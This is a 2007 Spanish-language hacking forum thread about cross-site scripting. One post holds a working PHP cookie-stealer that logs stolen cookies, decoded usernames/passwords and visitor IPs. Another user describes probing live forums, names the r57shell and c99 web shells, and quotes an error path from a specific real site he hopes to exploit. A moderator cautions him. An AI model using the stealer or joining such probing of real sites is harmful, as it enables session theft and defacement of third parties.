yeikos
Colaborador
 Desconectado
Mensajes: 1.363
|
Busca en Google información relacionada con HTML, JavaScript y PHP.
|
|
|
|
|
En línea
|
|
|
|
Grave
Desconectado
Mensajes: 221
Sois como sepulcros emblanquesidos que no se ven
|
Alquien podras explicar detenidamente este codigo se entiende un poco a simple vista pero algunas cosas no las entiendo... <?php
$archivo = fopen('log2.htm','a');//Aqui podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>
IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?> |
|
|
|
|
En línea
|
"y el conocimiento os hara libres"    Module Console1 Console.Write("Hello Word") Console.ReadLine() End Module |
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
|
|
|
|
|
En línea
|
|
|
|
Dark_Knight
Desconectado
Mensajes: 98
|
hola tengoun problema... cuando coloco <script>alert(5);</script> no me aparece el mensaje... sino que me aparece el post con el codigo escrito en donde se debe colocar el codigo... y/o que se tiene que hacer para que aparezca el mensaje... espero su respuesta gracias  |
|
|
|
|
En línea
|
El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....
|
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
Eso es por que la variable filtra los caracteres especiales, como pueden ser > o <, mostrado como resultado en tu caso <script>alert(5);</script>.
Examina el código fuente de la página web en busca del código que introdujiste...
|
|
|
|
|
En línea
|
|
|
|
Dark_Knight
Desconectado
Mensajes: 98
|
hola lo que pasa.. es que esto no me aparece  y no se como hacerlo... ya que lo estoy intentando desde el mismo foro de teambio.net para aprender... pero cuando coloco ese codigo... el mensaje de la imagen.. no me aparece... tengo que colocar el codigo en el post... y luego hacer click en previsualizar para que me aparezca el mensaje? espero su respuesta gracias |
|
|
|
« Última modificación: 02 Agosto 2007, 00:30 por Dark_Knight »
|
En línea
|
El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....
|
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
¿No se te ha pasado por la cabeza que quizás no sea vulnerable a ataques XSS?
|
|
|
|
|
En línea
|
|
|
|
Dark_Knight
Desconectado
Mensajes: 98
|
ahh... ok
una ultima pregunta... el codigo <SCRIPT> tiene que ser forzosamente en el post... o solo con encontrar un foro con vulnerabilidad XSS se puede hacer esto...?
|
|
|
|
|
En línea
|
El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....
|
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
La variable de entrada se puede encontrar en cualquier parte, en una simple dirección URL (GET), en un formulario POST, en el User-Agent, en la referencia, etcétera.
Deberías leer un poco sobre el funcionamiento de PHP y la recogida de datos...
|
|
|
|
|
En línea
|
|
|
|
Dark_Knight
Desconectado
Mensajes: 98
|
hola tengo una pregunta... con que foros es todavia vulnerable esta forma de defacing... ya que a todas las que intento siempre me aparece esto...  En vez de esto alguien me puede decir... que debo encontrar en un foro... que sea vulnerable a esto... espero me puedan ayudar... porque mas tutoriales que leo... videotutoriales que veo... y por mas que pregunto... solo me explican como explotar los fallos, pero no como encontralos... ya he utilizado scaners.. como Acuntex... he intentado haciendo... sm-check.md5... y mediante el exploit... tambien con exploits.. como r57shell.php, c99.php... pero no se que debo encontrar, me dice que existen variables que hacer que una pagina te muestre el error donde se colocaria el exploit para funcionar
Warning: include() [function.include]: Unable to access /public/imageFunctions.php in
/home/queenparad/domains/queenparadise.com
/public_html/modules/4nAlbum/public/displayCategory.php on line 21
pero cuando encuentro alguna pagina asi... no me funcionan los exploits... espero me puedan ayudar.. gracias |
|
|
|
|
En línea
|
El hombre no puede crear nada sin antes dar algo a cambio... para crear... algo del mismo valor debe perderse.... esa es la ley de la equivalencia de intercambio... y el que desafie esa ley se convertira en un desafio de las creencias del ser humano y de la existencia de dios....
|
|
|
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
No quiero chafarte el pastel... Pero si continuas probando esta técnica por todos los foros por los que vas, te va a caer una buena. . .
Tan poco hay que exagerar, como mucho queda expulsado de ese foro, pero como bien dices, no es plan de ir probandolo en todos los foros. |
|
|
|
|
En línea
|
|
|
|
|
Autor
